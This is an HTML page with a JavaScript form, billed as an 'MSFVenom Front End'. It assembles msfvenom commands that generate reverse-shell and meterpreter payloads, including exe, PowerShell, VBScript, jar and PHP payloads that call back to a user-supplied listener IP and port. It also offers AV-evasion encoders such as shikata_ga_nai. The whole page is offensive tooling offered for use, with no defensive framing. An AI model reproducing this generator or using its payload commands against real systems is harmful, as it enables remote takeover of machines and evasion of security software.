<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Make meterpreter payloads with an intuitive web UI. No download, no install, all web based">
    <title>MSFVenom Front End</title>
    <script>
        function output_command() {
            var outencoder = ""
            var lhost = document.getElementById("LHOST").value;
            var lport = document.getElementById("LPORT").value;
            var payload = document.getElementById("payload").value;
            var output = document.getElementById("output").value;
            var encoder = document.getElementById("encoder").value;
            var iterations = document.getElementById("iterations").value;
            if(encoder !== "none") { var outencoder="-e "+encoder+" -i "+iterations+" "; }
            var out = "msfvenom -p "+payload+" -f "+output+" "+outencoder+
            " LHOST="+lhost+" LPORT="+lport+" -o output."+output;
            document.getElementById("outputid").innerHTML=out;
        }
    </script>
</head>
<body>
    <form>
        <label for="LHOST">Your listener IP and port: </label>
        <input type="text" id="LHOST" value="127.0.0.1" size="13"> <input type="text" id="LPORT" size="4" value="4444"><br>
        <Label for="payload">Payload: </Label>
        <select id="payload">
            <option value="windows/shell/reverse_tcp">windows/shell/reverse_tcp</option>
            <option value="windows/meterpreter/reverse_tcp">windows/meterpreter/reverse_tcp</option>
            <option value="windows/powershell_reverse_tcp">windows/powershell_reverse_tcp</option>
            <option value="windows/shell/reverse_ipv6_tcp">windows/shell/reverse_ipv6_tcp</option>
            <option value="linux/x64/shell/reverse_tcp">linux/x64/shell/reverse_tcp</option>
            <option value="linux/x64/meterpreter/reverse_tcp">linux/x64/meterpreter/reverse_tcp</option>
            <option value="linux/x86/meterpreter/reverse_tcp">linux/x86/meterpreter/reverse_tcp</option>
            <option value="linux/x86/meterpreter/reverse_ipv6_tcp">linux/x86/meterpreter/reverse_ipv6_tcp</option>
            <option value="linux/armle/meterpreter/reverse_tcp">linux/armle/meterpreter/reverse_tcp</option>
            <option value="java/jsp_shell_reverse_tcp">java/jsp_shell_reverse_tcp</option>
            <option value="java/meterpreter/reverse_tcp">java/meterpreter/reverse_tcp</option>
            <option value="android/meterpreter_reverse_tcp">android/meterpreter_reverse_tcp</option>
            <option value="php/bind_php">php/bind_php</option>
            <option value="php/meterpreter/reverse_tcp">php/meterpreter/reverse_tcp</option>
            <option value="python/meterpreter_reverse_tcp">python/meterpreter_reverse_tcp</option>
            <option value="python/shell_reverse_udp">python/shell_reverse_udp</option>
        </select><br>
    <label for="output">Output Format: </label>
        <select id="output">
            <option value="exe">exe</option>
            <option value="psh">powershell</option>
            <option value="vbs">vbscript</option>
            <option value="sh">sh</option>
            <option value="bash">bash</option>
            <option value="jar">jar</option>
            <option value="py">py</option>
            <option value="php">php</option>
            <option value="c">c</option>
        </select><br>
    <label for="encoder">Encoder: </label>
        <select id="encoder">
            <option value="none">None</option>
            <option value="x86/shikata_ga_nai">x86/shikata_ga_nai</option>
            <option value="x86/xor_dynamic">x86/xor_dynamic</option>
            <option value="x86/call4_dword_xor">x86/call4_dword_xor</option>
            <option value="x64/xor_dynamic">x64/xor_dynamic</option>
            <option value="cmd/powershell_base64">cmd/powershell_base64</option>
            <option value="cmd/perl">cmd/perl</option>
        </select><br>
    <label for="iterations">Iterations: </label>
    <input type="text" size="3" id="iterations" value="1"><br>
    <input type="button" value="Output" onclick="output_command()">
    </form>
    <blockquote id="outputid"></blockquote>
</body>
</html>